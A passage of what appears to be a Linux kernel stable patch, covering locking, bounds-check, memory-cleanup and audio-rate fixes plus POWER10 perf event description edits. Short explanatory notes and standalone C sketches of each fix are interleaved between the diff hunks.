++	spin_lock_bh(&smc_lgr_list.lock);
+ 	list_for_each_entry_safe(lgr, n, &smc_lgr_list.list, list) {
+ 		struct smc_link *link;
+ 
+@@ -1665,6 +1666,7 @@ void smcr_port_add(struct smc_ib_device *smcibdev, u8 ibport)
+ 		if (link)
+ 			smc_llc_add_link_local(link);
+ 	}
++	spin_unlock_bh(&smc_lgr_list.lock);
+ }
+ 
+ /* link is down - switch connections to alternate link,
+diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
+index 96b4545ea700f..9be00ebbb2341 100644
+--- a/net/tls/tls_sw.c
++++ b/net/tls/tls_sw.c
+@@ -802,7 +802,7 @@ static int bpf_exec_tx_verdict(struct sk_msg *msg, struct sock *sk,
+ 	psock = sk_psock_get(sk);
+ 	if (!psock || !policy) {
+ 		err = tls_push_record(sk, flags, record_type);
+-		if (err && sk->sk_err == EBADMSG) {
++		if (err && err != -EINPROGRESS && sk->sk_err == EBADMSG) {
+ 			*copied -= sk_msg_free(sk, msg);
+ 			tls_free_open_rec(sk);
+ 			err = -sk->sk_err;
+@@ -831,7 +831,7 @@ more_data:
+ 	switch (psock->eval) {
+ 	case __SK_PASS:
+ 		err = tls_push_record(sk, flags, record_type);
+-		if (err && sk->sk_err == EBADMSG) {
++		if (err && err != -EINPROGRESS && sk->sk_err == EBADMSG) {
+ 			*copied -= sk_msg_free(sk, msg);
+ 			tls_free_open_rec(sk);
+ 			err = -sk->sk_err;
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index ca31847a6c70c..310952f4c68f7 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -667,7 +667,7 @@ static void unix_release_sock(struct sock *sk, int embrion)
+ 	 *	  What the above comment does talk about? --ANK(980817)
+ 	 */
+ 
+-	if (unix_tot_inflight)
++	if (READ_ONCE(unix_tot_inflight))
+ 		unix_gc();		/* Garbage collect fds */
+ }
+ 
+diff --git a/net/unix/scm.c b/net/unix/scm.c
+index aa27a02478dc1..e8e2a00bb0f58 100644
+--- a/net/unix/scm.c
++++ b/net/unix/scm.c
+@@ -63,7 +63,7 @@ void unix_inflight(struct user_struct *user, struct file *fp)
+ 		/* Paired with READ_ONCE() in wait_for_unix_gc() */
+ 		WRITE_ONCE(unix_tot_inflight, unix_tot_inflight + 1);
+ 	}
+-	user->unix_inflight++;
++	WRITE_ONCE(user->unix_inflight, user->unix_inflight + 1);
+ 	spin_unlock(&unix_gc_lock);
+ }
+ 
+@@ -84,7 +84,7 @@ void unix_notinflight(struct user_struct *user, struct file *fp)
+ 		/* Paired with READ_ONCE() in wait_for_unix_gc() */
+ 		WRITE_ONCE(unix_tot_inflight, unix_tot_inflight - 1);
+ 	}
+-	user->unix_inflight--;
++	WRITE_ONCE(user->unix_inflight, user->unix_inflight - 1);
+ 	spin_unlock(&unix_gc_lock);
+ }
+ 
+@@ -98,7 +98,7 @@ static inline bool too_many_unix_fds(struct task_struct *p)
+ {
+ 	struct user_struct *user = current_user();
+ 
+-	if (unlikely(user->unix_inflight > task_rlimit(p, RLIMIT_NOFILE)))
++	if (unlikely(READ_ONCE(user->unix_inflight) > task_rlimit(p, RLIMIT_NOFILE)))
+ 		return !capable(CAP_SYS_RESOURCE) && !capable(CAP_SYS_ADMIN);
+ 	return false;
+ }
+diff --git a/net/xdp/xsk_diag.c b/net/xdp/xsk_diag.c
+index c014217f5fa7d..22b36c8143cfd 100644
+--- a/net/xdp/xsk_diag.c
++++ b/net/xdp/xsk_diag.c
+@@ -111,6 +111,9 @@ static int xsk_diag_fill(struct sock *sk, struct sk_buff *nlskb,
+ 	sock_diag_save_cookie(sk, msg->xdiag_cookie);
+ 
+ 	mutex_lock(&xs->mutex);
++	if (READ_ONCE(xs->state) == XSK_UNBOUND)
++		goto out_nlmsg_trim;
++
+ 	if ((req->xdiag_show & XDP_SHOW_INFO) && xsk_diag_put_info(xs, nlskb))
+ 		goto out_nlmsg_trim;
+ 
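The xsk_diag fix checks the socket state first thing under xs->mutex and bails out before touching rings that an unbound socket may never have set up. The shape is an ordinary guard clause under a lock (sketch with stand-in types, not the XDP structures):

#include <pthread.h>
#include <stdio.h>

enum state { UNBOUND, BOUND };

struct xsk { pthread_mutex_t mutex; enum state state; };

static int diag_fill(struct xsk *xs)
{
	int err = -1;

	pthread_mutex_lock(&xs->mutex);
	if (xs->state == UNBOUND)
		goto out; /* nothing valid to report yet */
	puts("dumping ring info");
	err = 0;
out:
	pthread_mutex_unlock(&xs->mutex);
	return err;
}

int main(void)
{
	struct xsk xs = { PTHREAD_MUTEX_INITIALIZER, UNBOUND };

	printf("fill: %d\n", diag_fill(&xs));
	return 0;
}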
+diff --git a/scripts/kconfig/preprocess.c b/scripts/kconfig/preprocess.c
+index 748da578b418c..d1f5bcff4b62d 100644
+--- a/scripts/kconfig/preprocess.c
++++ b/scripts/kconfig/preprocess.c
+@@ -396,6 +396,9 @@ static char *eval_clause(const char *str, size_t len, int argc, char *argv[])
+ 
+ 		p++;
+ 	}
++
++	if (new_argc >= FUNCTION_MAX_ARGS)
++		pperror("too many function arguments");
+ 	new_argv[new_argc++] = prev;
+ 
+ 	/*
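The preprocess.c hunk adds the bounds check that was missing before the final new_argv[new_argc++] store; without it, a clause with exactly FUNCTION_MAX_ARGS arguments wrote one slot past the array. The check-before-store idiom in isolation (sketch):

#include <stdio.h>
#include <stdlib.h>

#define MAX_ARGS 3

static const char *argv_buf[MAX_ARGS];

static void push_arg(int *argc, const char *arg)
{
	/* Reject before the store, not after: the store itself is the overflow. */
	if (*argc >= MAX_ARGS) {
		fprintf(stderr, "too many function arguments\n");
		exit(1);
	}
	argv_buf[(*argc)++] = arg;
}

int main(void)
{
	int argc = 0;

	push_arg(&argc, "a");
	push_arg(&argc, "b");
	printf("argc = %d\n", argc);
	return 0;
}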
+diff --git a/scripts/package/mkspec b/scripts/package/mkspec
+index 70392fd2fd29c..f892cf8e37f03 100755
+--- a/scripts/package/mkspec
++++ b/scripts/package/mkspec
+@@ -51,7 +51,7 @@ $S	Source: kernel-$__KERNELRELEASE.tar.gz
+ 	Provides: $PROVIDES
+ 	# $UTS_MACHINE as a fallback of _arch in case
+ 	# /usr/lib/rpm/platform/*/macros was not included.
+-	%define _arch %{?_arch:$UTS_MACHINE}
++	%{!?_arch: %define _arch $UTS_MACHINE}
+ 	%define __spec_install_post /usr/lib/rpm/brp-compress || :
+ 	%define debug_package %{nil}
+ 
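In mkspec, the old line `%define _arch %{?_arch:$UTS_MACHINE}` expanded to the fallback only when _arch was already defined, which is backwards; `%{!?_arch: %define _arch $UTS_MACHINE}` defines it only when it is missing. The same define-if-undefined idea expressed with the C preprocessor:

#include <stdio.h>

/* Fall back only when the build did not already provide ARCH,
 * mirroring RPM's %{!?_arch: %define _arch $UTS_MACHINE}. */
#ifndef ARCH
#define ARCH "x86_64"
#endif

int main(void)
{
	printf("arch: %s\n", ARCH);
	return 0;
}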
+diff --git a/sound/soc/tegra/tegra210_sfc.c b/sound/soc/tegra/tegra210_sfc.c
+index 368f077e7bee7..5d2125aa61229 100644
+--- a/sound/soc/tegra/tegra210_sfc.c
++++ b/sound/soc/tegra/tegra210_sfc.c
+@@ -2,7 +2,7 @@
+ //
+ // tegra210_sfc.c - Tegra210 SFC driver
+ //
+-// Copyright (c) 2021 NVIDIA CORPORATION.  All rights reserved.
++// Copyright (c) 2021-2023 NVIDIA CORPORATION.  All rights reserved.
+ 
+ #include <linux/clk.h>
+ #include <linux/device.h>
+@@ -42,6 +42,7 @@ static const int tegra210_sfc_rates[TEGRA210_SFC_NUM_RATES] = {
+ 	32000,
+ 	44100,
+ 	48000,
++	64000,
+ 	88200,
+ 	96000,
+ 	176400,
+@@ -2857,6 +2858,7 @@ static s32 *coef_addr_table[TEGRA210_SFC_NUM_RATES][TEGRA210_SFC_NUM_RATES] = {
+ 		coef_8to32,
+ 		coef_8to44,
+ 		coef_8to48,
++		UNSUPP_CONV,
+ 		coef_8to88,
+ 		coef_8to96,
+ 		UNSUPP_CONV,
+@@ -2872,6 +2874,7 @@ static s32 *coef_addr_table[TEGRA210_SFC_NUM_RATES][TEGRA210_SFC_NUM_RATES] = {
+ 		coef_11to32,
+ 		coef_11to44,
+ 		coef_11to48,
++		UNSUPP_CONV,
+ 		coef_11to88,
+ 		coef_11to96,
+ 		UNSUPP_CONV,
+@@ -2887,6 +2890,7 @@ static s32 *coef_addr_table[TEGRA210_SFC_NUM_RATES][TEGRA210_SFC_NUM_RATES] = {
+ 		coef_16to32,
+ 		coef_16to44,
+ 		coef_16to48,
++		UNSUPP_CONV,
+ 		coef_16to88,
+ 		coef_16to96,
+ 		coef_16to176,
+@@ -2902,6 +2906,7 @@ static s32 *coef_addr_table[TEGRA210_SFC_NUM_RATES][TEGRA210_SFC_NUM_RATES] = {
+ 		coef_22to32,
+ 		coef_22to44,
+ 		coef_22to48,
++		UNSUPP_CONV,
+ 		coef_22to88,
+ 		coef_22to96,
+ 		coef_22to176,
+@@ -2917,6 +2922,7 @@ static s32 *coef_addr_table[TEGRA210_SFC_NUM_RATES][TEGRA210_SFC_NUM_RATES] = {
+ 		coef_24to32,
+ 		coef_24to44,
+ 		coef_24to48,
++		UNSUPP_CONV,
+ 		coef_24to88,
+ 		coef_24to96,
+ 		coef_24to176,
+@@ -2932,6 +2938,7 @@ static s32 *coef_addr_table[TEGRA210_SFC_NUM_RATES][TEGRA210_SFC_NUM_RATES] = {
+ 		BYPASS_CONV,
+ 		coef_32to44,
+ 		coef_32to48,
++		UNSUPP_CONV,
+ 		coef_32to88,
+ 		coef_32to96,
+ 		coef_32to176,
+@@ -2947,6 +2954,7 @@ static s32 *coef_addr_table[TEGRA210_SFC_NUM_RATES][TEGRA210_SFC_NUM_RATES] = {
+ 		coef_44to32,
+ 		BYPASS_CONV,
+ 		coef_44to48,
++		UNSUPP_CONV,
+ 		coef_44to88,
+ 		coef_44to96,
+ 		coef_44to176,
+@@ -2962,11 +2970,28 @@ static s32 *coef_addr_table[TEGRA210_SFC_NUM_RATES][TEGRA210_SFC_NUM_RATES] = {
+ 		coef_48to32,
+ 		coef_48to44,
+ 		BYPASS_CONV,
++		UNSUPP_CONV,
+ 		coef_48to88,
+ 		coef_48to96,
+ 		coef_48to176,
+ 		coef_48to192,
+ 	},
++	/* Conversions from 64 kHz */
++	{
++		UNSUPP_CONV,
++		UNSUPP_CONV,
++		UNSUPP_CONV,
++		UNSUPP_CONV,
++		UNSUPP_CONV,
++		UNSUPP_CONV,
++		UNSUPP_CONV,
++		UNSUPP_CONV,
++		UNSUPP_CONV,
++		UNSUPP_CONV,
++		UNSUPP_CONV,
++		UNSUPP_CONV,
++		UNSUPP_CONV,
++	},
+ 	/* Conversions from 88.2 kHz */
+ 	{
+ 		coef_88to8,
+@@ -2977,6 +3002,7 @@ static s32 *coef_addr_table[TEGRA210_SFC_NUM_RATES][TEGRA210_SFC_NUM_RATES] = {
+ 		coef_88to32,
+ 		coef_88to44,
+ 		coef_88to48,
++		UNSUPP_CONV,
+ 		BYPASS_CONV,
+ 		coef_88to96,
+ 		coef_88to176,
+@@ -2991,6 +3017,7 @@ static s32 *coef_addr_table[TEGRA210_SFC_NUM_RATES][TEGRA210_SFC_NUM_RATES] = {
+ 		coef_96to32,
+ 		coef_96to44,
+ 		coef_96to48,
++		UNSUPP_CONV,
+ 		coef_96to88,
+ 		BYPASS_CONV,
+ 		coef_96to176,
+@@ -3006,6 +3033,7 @@ static s32 *coef_addr_table[TEGRA210_SFC_NUM_RATES][TEGRA210_SFC_NUM_RATES] = {
+ 		coef_176to32,
+ 		coef_176to44,
+ 		coef_176to48,
++		UNSUPP_CONV,
+ 		coef_176to88,
+ 		coef_176to96,
+ 		BYPASS_CONV,
+@@ -3021,6 +3049,7 @@ static s32 *coef_addr_table[TEGRA210_SFC_NUM_RATES][TEGRA210_SFC_NUM_RATES] = {
+ 		coef_192to32,
+ 		coef_192to44,
+ 		coef_192to48,
++		UNSUPP_CONV,
+ 		coef_192to88,
+ 		coef_192to96,
+ 		coef_192to176,
+diff --git a/sound/soc/tegra/tegra210_sfc.h b/sound/soc/tegra/tegra210_sfc.h
+index 5a6b66e297d8f..a4c993d79403a 100644
+--- a/sound/soc/tegra/tegra210_sfc.h
++++ b/sound/soc/tegra/tegra210_sfc.h
+@@ -2,7 +2,7 @@
+ /*
+  * tegra210_sfc.h - Definitions for Tegra210 SFC driver
+  *
+- * Copyright (c) 2021 NVIDIA CORPORATION.  All rights reserved.
++ * Copyright (c) 2021-2023 NVIDIA CORPORATION.  All rights reserved.
+  *
+  */
+ 
+@@ -47,7 +47,7 @@
+ #define TEGRA210_SFC_EN_SHIFT			0
+ #define TEGRA210_SFC_EN				(1 << TEGRA210_SFC_EN_SHIFT)
+ 
+-#define TEGRA210_SFC_NUM_RATES 12
++#define TEGRA210_SFC_NUM_RATES 13
+ 
+ /* Fields in TEGRA210_SFC_COEF_RAM */
+ #define TEGRA210_SFC_COEF_RAM_EN		BIT(0)
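Adding 64 kHz meant bumping TEGRA210_SFC_NUM_RATES from 12 to 13, appending one UNSUPP_CONV column to every existing row, and inserting one all-UNSUPP_CONV row, because coef_addr_table is indexed as [input rate][output rate]. A static assertion is a cheap way to keep a rate list and its square conversion table in step (sketch, not the driver's tables):

#include <stdio.h>

#define NUM_RATES 3

static const int rates[] = { 8000, 44100, 48000 };

/* conv[in][out]; NULL would mark an unsupported conversion */
static const char *conv[NUM_RATES][NUM_RATES] = {
	{ "bypass", "8to44",  "8to48"  },
	{ "44to8",  "bypass", "44to48" },
	{ "48to8",  "48to44", "bypass" },
};

_Static_assert(sizeof(rates) / sizeof(rates[0]) == NUM_RATES,
	       "rate list and conversion table out of step");

int main(void)
{
	printf("%d -> %d: %s\n", rates[0], rates[2], conv[0][2]);
	return 0;
}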
+diff --git a/tools/perf/builtin-top.c b/tools/perf/builtin-top.c
+index 4b3ff7687236e..f9917848cdad0 100644
+--- a/tools/perf/builtin-top.c
++++ b/tools/perf/builtin-top.c
+@@ -1751,6 +1751,7 @@ int cmd_top(int argc, const char **argv)
+ 	top.session = perf_session__new(NULL, NULL);
+ 	if (IS_ERR(top.session)) {
+ 		status = PTR_ERR(top.session);
++		top.session = NULL;
+ 		goto out_delete_evlist;
+ 	}
+ 
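perf_session__new() reports failure through an ERR_PTR-style encoded pointer rather than NULL, so the fix resets top.session to NULL before jumping to the shared cleanup label; otherwise the teardown path would try to free the error cookie. A standalone sketch of the pattern (the err-pointer helpers are simplified stand-ins):

#include <stdio.h>
#include <stdlib.h>

static void *new_session(int fail) { return fail ? (void *)-12L : malloc(16); }
static int is_err(const void *p) { return (unsigned long)p >= (unsigned long)-4095L; }

static void session_delete(void *s)
{
	free(s); /* tolerates NULL, but not an error cookie */
}

int main(void)
{
	int status = 0;
	void *session = new_session(1);

	if (is_err(session)) {
		status = (int)(long)session; /* the encoded -errno */
		session = NULL;              /* the fix: never hand the cookie to cleanup */
		goto out;
	}
out:
	session_delete(session);
	printf("status: %d\n", status);
	return status ? 1 : 0;
}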
+diff --git a/tools/perf/builtin-trace.c b/tools/perf/builtin-trace.c
+index 97b17f8941dc0..93dab6423a048 100644
+--- a/tools/perf/builtin-trace.c
++++ b/tools/perf/builtin-trace.c
+@@ -2293,7 +2293,7 @@ static void syscall__exit(struct syscall *sc)
+ 	if (!sc)
+ 		return;
+ 
+-	free(sc->arg_fmt);
++	zfree(&sc->arg_fmt);
+ }
+ 
+ static int trace__sys_enter(struct trace *trace, struct evsel *evsel,
+@@ -3124,13 +3124,8 @@ static void evlist__free_syscall_tp_fields(struct evlist *evlist)
+ 	struct evsel *evsel;
+ 
+ 	evlist__for_each_entry(evlist, evsel) {
+-		struct evsel_trace *et = evsel->priv;
+-
+-		if (!et || !evsel->tp_format || strcmp(evsel->tp_format->system, "syscalls"))
+-			continue;
+-
+-		free(et->fmt);
+-		free(et);
++		evsel_trace__delete(evsel->priv);
++		evsel->priv = NULL;
+ 	}
+ }
+ 
+@@ -4765,11 +4760,11 @@ static void trace__exit(struct trace *trace)
+ 	int i;
+ 
+ 	strlist__delete(trace->ev_qualifier);
+-	free(trace->ev_qualifier_ids.entries);
++	zfree(&trace->ev_qualifier_ids.entries);
+ 	if (trace->syscalls.table) {
+ 		for (i = 0; i <= trace->sctbl->syscalls.max_id; i++)
+ 			syscall__exit(&trace->syscalls.table[i]);
+-		free(trace->syscalls.table);
++		zfree(&trace->syscalls.table);
+ 	}
+ 	syscalltbl__delete(trace->sctbl);
+ 	zfree(&trace->perfconfig_events);
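The builtin-trace.c changes replace free() with zfree(), which frees the object and nulls the owning pointer in one step, so a second teardown pass sees NULL instead of a dangling pointer. The whole helper fits in a macro; a sketch of the tools/perf idiom:

#include <stdio.h>
#include <stdlib.h>

/* Free the object and poison the caller's pointer in one step. */
#define ZFREE(pp) do { free(*(pp)); *(pp) = NULL; } while (0)

int main(void)
{
	char *buf = malloc(32);

	ZFREE(&buf);
	ZFREE(&buf); /* the second call is now harmless: free(NULL) */
	printf("buf: %p\n", (void *)buf);
	return 0;
}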
+diff --git a/tools/perf/pmu-events/arch/powerpc/power10/cache.json b/tools/perf/pmu-events/arch/powerpc/power10/cache.json
+index 605be14f441c8..9cb929bb64afd 100644
+--- a/tools/perf/pmu-events/arch/powerpc/power10/cache.json
++++ b/tools/perf/pmu-events/arch/powerpc/power10/cache.json
+@@ -17,7 +17,7 @@
+   {
+     "EventCode": "0x34056",
+     "EventName": "PM_EXEC_STALL_LOAD_FINISH",
+-    "BriefDescription": "Cycles in which the oldest instruction in the pipeline was finishing a load after its data was reloaded from a data source beyond the local L1; cycles in which the LSU was processing an L1-hit; cycles in which the NTF instruction merged with another load in the LMQ; cycles in which the NTF instruction is waiting for a data reload for a load miss, but the data comes back with a non-NTF instruction."
++    "BriefDescription": "Cycles in which the oldest instruction in the pipeline was finishing a load after its data was reloaded from a data source beyond the local L1; cycles in which the LSU was processing an L1-hit; cycles in which the next-to-finish (NTF) instruction merged with another load in the LMQ; cycles in which the NTF instruction is waiting for a data reload for a load miss, but the data comes back with a non-NTF instruction."
+   },
+   {
+     "EventCode": "0x3006C",
+@@ -27,7 +27,7 @@
+   {
+     "EventCode": "0x300F4",
+     "EventName": "PM_RUN_INST_CMPL_CONC",
+-    "BriefDescription": "PowerPC instructions completed by this thread when all threads in the core had the run-latch set."
++    "BriefDescription": "PowerPC instruction completed by this thread when all threads in the core had the run-latch set."
+   },
+   {
+     "EventCode": "0x4C016",
+diff --git a/tools/perf/pmu-events/arch/powerpc/power10/floating_point.json b/tools/perf/pmu-events/arch/powerpc/power10/floating_point.json
+deleted file mode 100644
+index 54acb55e2c8c6..0000000000000
+--- a/tools/perf/pmu-events/arch/powerpc/power10/floating_point.json
++++ /dev/null
+@@ -1,7 +0,0 @@
+-[
+-  {
+-    "EventCode": "0x4016E",
+-    "EventName": "PM_THRESH_NOT_MET",
+-    "BriefDescription": "Threshold counter did not meet threshold."
+-  }
+-]
+diff --git a/tools/perf/pmu-events/arch/powerpc/power10/frontend.json b/tools/perf/pmu-events/arch/powerpc/power10/frontend.json
+index 558f9530f54ec..61e9e0222c873 100644
+--- a/tools/perf/pmu-events/arch/powerpc/power10/frontend.json
++++ b/tools/perf/pmu-events/arch/powerpc/power10/frontend.json
+@@ -7,7 +7,7 @@
+   {
+     "EventCode": "0x10006",
+     "EventName": "PM_DISP_STALL_HELD_OTHER_CYC",
+-    "BriefDescription": "Cycles in which the NTC instruction is held at dispatch for any other reason."
++    "BriefDescription": "Cycles in which the next-to-complete (NTC) instruction is held at dispatch for any other reason."
+   },
+   {
+     "EventCode": "0x10010",
+@@ -32,12 +32,12 @@
+   {
+     "EventCode": "0x1D05E",
+     "EventName": "PM_DISP_STALL_HELD_HALT_CYC",
+-    "BriefDescription": "Cycles in which the NTC instruction is held at dispatch because of power management."
++    "BriefDescription": "Cycles in which the next-to-complete (NTC) instruction is held at dispatch because of power management."
+   },
+   {
+     "EventCode": "0x1E050",
+     "EventName": "PM_DISP_STALL_HELD_STF_MAPPER_CYC",
+-    "BriefDescription": "Cycles in which the NTC instruction is held at dispatch because the STF mapper/SRB was full. Includes GPR (count, link, tar), VSR, VMR, FPR."
++    "BriefDescription": "Cycles in which the next-to-complete (NTC) instruction is held at dispatch because the STF mapper/SRB was full. Includes GPR (count, link, tar), VSR, VMR, FPR."
+   },
+   {
+     "EventCode": "0x1F054",
+@@ -67,7 +67,7 @@
+   {
+     "EventCode": "0x100F6",
+     "EventName": "PM_IERAT_MISS",
+-    "BriefDescription": "IERAT Reloaded to satisfy an IERAT miss. All page sizes are counted by this event."
++    "BriefDescription": "IERAT Reloaded to satisfy an IERAT miss. All page sizes are counted by this event. This event only counts instruction demand access."
+   },
+   {
+     "EventCode": "0x100F8",
+@@ -77,7 +77,7 @@
+   {
+     "EventCode": "0x20006",
+     "EventName": "PM_DISP_STALL_HELD_ISSQ_FULL_CYC",
+-    "BriefDescription": "Cycles in which the NTC instruction is held at dispatch due to Issue queue full. Includes issue queue and branch queue."
++    "BriefDescription": "Cycles in which the next-to-complete (NTC) instruction is held at dispatch due to Issue queue full. Includes issue queue and branch queue."
+   },
+   {
+     "EventCode": "0x20114",
+@@ -102,7 +102,7 @@
+   {
+     "EventCode": "0x2D01A",
+     "EventName": "PM_DISP_STALL_IC_MISS",
+-    "BriefDescription": "Cycles when dispatch was stalled for this thread due to an Icache Miss."
++    "BriefDescription": "Cycles when dispatch was stalled for this thread due to an instruction cache miss."
+   },
+   {
+     "EventCode": "0x2E018",
+@@ -112,7 +112,7 @@
+   {
+     "EventCode": "0x2E01A",
+     "EventName": "PM_DISP_STALL_HELD_XVFC_MAPPER_CYC",
+-    "BriefDescription": "Cycles in which the NTC instruction is held at dispatch because the XVFC mapper/SRB was full."
++    "BriefDescription": "Cycles in which the next-to-complete (NTC) instruction is held at dispatch because the XVFC mapper/SRB was full."
+   },
+   {
+     "EventCode": "0x2C142",
+@@ -137,7 +137,7 @@
+   {
+     "EventCode": "0x30004",
+     "EventName": "PM_DISP_STALL_FLUSH",
+-    "BriefDescription": "Cycles when dispatch was stalled because of a flush that happened to an instruction(s) that was not yet NTC. PM_EXEC_STALL_NTC_FLUSH only includes instructions that were flushed after becoming NTC."
++    "BriefDescription": "Cycles when dispatch was stalled because of a flush that happened to an instruction(s) that was not yet next-to-complete (NTC). PM_EXEC_STALL_NTC_FLUSH only includes instructions that were flushed after becoming NTC."
+   },
+   {
+     "EventCode": "0x3000A",
+@@ -157,7 +157,7 @@
+   {
+     "EventCode": "0x30018",
+     "EventName": "PM_DISP_STALL_HELD_SCOREBOARD_CYC",
+-    "BriefDescription": "Cycles in which the NTC instruction is held at dispatch while waiting on the Scoreboard. This event combines VSCR and FPSCR together."
++    "BriefDescription": "Cycles in which the next-to-complete (NTC) instruction is held at dispatch while waiting on the Scoreboard. This event combines VSCR and FPSCR together."
+   },
+   {
+     "EventCode": "0x30026",
+@@ -182,7 +182,7 @@
+   {
+     "EventCode": "0x3D05C",
+     "EventName": "PM_DISP_STALL_HELD_RENAME_CYC",
+-    "BriefDescription": "Cycles in which the NTC instruction is held at dispatch because the mapper/SRB was full. Includes GPR (count, link, tar), VSR, VMR, FPR and XVFC."
++    "BriefDescription": "Cycles in which the next-to-complete (NTC) instruction is held at dispatch because the mapper/SRB was full. Includes GPR (count, link, tar), VSR, VMR, FPR and XVFC."
+   },
+   {
+     "EventCode": "0x3E052",
+@@ -192,7 +192,7 @@
+   {
+     "EventCode": "0x3E054",
+     "EventName": "PM_LD_MISS_L1",
+-    "BriefDescription": "Load Missed L1, counted at execution time (can be greater than loads finished). LMQ merges are not included in this count. i.e. if a load instruction misses on an address that is already allocated on the LMQ, this event will not increment for that load). Note that this count is per slice, so if a load spans multiple slices this event will increment multiple times for a single load."
++    "BriefDescription": "Load missed L1, counted at finish time. LMQ merges are not included in this count. i.e. if a load instruction misses on an address that is already allocated on the LMQ, this event will not increment for that load). Note that this count is per slice, so if a load spans multiple slices this event will increment multiple times for a single load."
+   },
+   {
+     "EventCode": "0x301EA",
+@@ -202,7 +202,7 @@
+   {
+     "EventCode": "0x300FA",
+     "EventName": "PM_INST_FROM_L3MISS",
+-    "BriefDescription": "The processor's instruction cache was reloaded from a source other than the local core's L1, L2, or L3 due to a demand miss."
++    "BriefDescription": "The processor's instruction cache was reloaded from beyond the local core's L3 due to a demand miss."
+   },
+   {
+     "EventCode": "0x40006",
+@@ -232,16 +232,16 @@
+   {
+     "EventCode": "0x4E01A",
+     "EventName": "PM_DISP_STALL_HELD_CYC",
+-    "BriefDescription": "Cycles in which the NTC instruction is held at dispatch for any reason."
++    "BriefDescription": "Cycles in which the next-to-complete (NTC) instruction is held at dispatch for any reason."
+   },
+   {
+     "EventCode": "0x4003C",
+     "EventName": "PM_DISP_STALL_HELD_SYNC_CYC",
+-    "BriefDescription": "Cycles in which the NTC instruction is held at dispatch because of a synchronizing instruction that requires the ICT to be empty before dispatch."
++    "BriefDescription": "Cycles in which the next-to-complete (NTC) instruction is held at dispatch because of a synchronizing instruction that requires the ICT to be empty before dispatch."
+   },
+   {
+     "EventCode": "0x44056",
+     "EventName": "PM_VECTOR_ST_CMPL",
+-    "BriefDescription": "Vector store instructions completed."
++    "BriefDescription": "Vector store instruction completed."
+   }
+ ]
+diff --git a/tools/perf/pmu-events/arch/powerpc/power10/marked.json b/tools/perf/pmu-events/arch/powerpc/power10/marked.json
+index 58b5dfe3a2731..f2436fc5537ce 100644
+--- a/tools/perf/pmu-events/arch/powerpc/power10/marked.json
++++ b/tools/perf/pmu-events/arch/powerpc/power10/marked.json
+@@ -19,11 +19,6 @@
+     "EventName": "PM_MRK_BR_TAKEN_CMPL",
+     "BriefDescription": "Marked Branch Taken instruction completed."
+   },
+-  {
+-    "EventCode": "0x20112",
+-    "EventName": "PM_MRK_NTF_FIN",
+-    "BriefDescription": "The marked instruction became the oldest in the pipeline before it finished. It excludes instructions that finish at dispatch."
+-  },
+   {
+     "EventCode": "0x2C01C",
+     "EventName": "PM_EXEC_STALL_DMISS_OFF_CHIP",
+@@ -62,17 +57,12 @@
+   {
+     "EventCode": "0x200FD",
+     "EventName": "PM_L1_ICACHE_MISS",
+-    "BriefDescription": "Demand iCache Miss."
+-  },
+-  {
+-    "EventCode": "0x30130",
+-    "EventName": "PM_MRK_INST_FIN",
+-    "BriefDescription": "marked instruction finished. Excludes instructions that finish at dispatch. Note that stores always finish twice since the address gets issued to the LSU and the data gets issued to the VSU."
++    "BriefDescription": "Demand instruction cache miss."
+   },
+   {
+     "EventCode": "0x34146",
+     "EventName": "PM_MRK_LD_CMPL",
+-    "BriefDescription": "Marked loads completed."
++    "BriefDescription": "Marked load instruction completed."
+   },
+   {
+     "EventCode": "0x3E158",
+@@ -82,12 +72,12 @@
+   {
+     "EventCode": "0x3E15A",
+     "EventName": "PM_MRK_ST_FIN",
+-    "BriefDescription": "The marked instruction was a store of any kind."
++    "BriefDescription": "Marked store instruction finished."
+   },
+   {
+     "EventCode": "0x30068",
+     "EventName": "PM_L1_ICACHE_RELOADED_PREF",
+-    "BriefDescription": "Counts all Icache prefetch reloads ( includes demand turned into prefetch)."
++    "BriefDescription": "Counts all instruction cache prefetch reloads (includes demand turned into prefetch)."
+   },
+   {
+     "EventCode": "0x301E4",
+@@ -102,12 +92,12 @@
+   {
+     "EventCode": "0x300FE",
+     "EventName": "PM_DATA_FROM_L3MISS",
+-    "BriefDescription": "The processor's data cache was reloaded from a source other than the local core's L1, L2, or L3 due to a demand miss."
++    "BriefDescription": "The processor's L1 data cache was reloaded from beyond the local core's L3 due to a demand miss."
+   },
+   {
+     "EventCode": "0x40012",
+     "EventName": "PM_L1_ICACHE_RELOADED_ALL",
+-    "BriefDescription": "Counts all Icache reloads includes demand, prefetch, prefetch turned into demand and demand turned into prefetch."
++    "BriefDescription": "Counts all instruction cache reloads includes demand, prefetch, prefetch turned into demand and demand turned into prefetch."
+   },
+   {
+     "EventCode": "0x40134",
+@@ -117,22 +107,22 @@
+   {
+     "EventCode": "0x4505A",
+     "EventName": "PM_SP_FLOP_CMPL",
+-    "BriefDescription": "Single Precision floating point instructions completed."
++    "BriefDescription": "Single Precision floating point instruction completed."
+   },
+   {
+     "EventCode": "0x4D058",
+     "EventName": "PM_VECTOR_FLOP_CMPL",
+-    "BriefDescription": "Vector floating point instructions completed."
++    "BriefDescription": "Vector floating point instruction completed."
+   },
+   {
+     "EventCode": "0x4D05A",
+     "EventName": "PM_NON_MATH_FLOP_CMPL",
+-    "BriefDescription": "Non Math instructions completed."
++    "BriefDescription": "Non Math instruction completed."
+   },
+   {
+     "EventCode": "0x401E0",
+     "EventName": "PM_MRK_INST_CMPL",
+-    "BriefDescription": "marked instruction completed."
++    "BriefDescription": "Marked instruction completed."
+   },
+   {
+     "EventCode": "0x400FE",
+diff --git a/tools/perf/pmu-events/arch/powerpc/power10/memory.json b/tools/perf/pmu-events/arch/powerpc/power10/memory.json
+index 843b51f531e95..c4c10ca98cad7 100644
+--- a/tools/perf/pmu-events/arch/powerpc/power10/memory.json
++++ b/tools/perf/pmu-events/arch/powerpc/power10/memory.json
+@@ -47,7 +47,7 @@
+   {
+     "EventCode": "0x10062",
+     "EventName": "PM_LD_L3MISS_PEND_CYC",
+-    "BriefDescription": "Cycles L3 miss was pending for this thread."
++    "BriefDescription": "Cycles in which an L3 miss was pending for this thread."
+   },
+   {
+     "EventCode": "0x20010",
+@@ -132,7 +132,7 @@
+   {
+     "EventCode": "0x300FC",
+     "EventName": "PM_DTLB_MISS",
+-    "BriefDescription": "The DPTEG required for the load/store instruction in execution was missing from the TLB. It includes pages of all sizes for demand and prefetch activity."
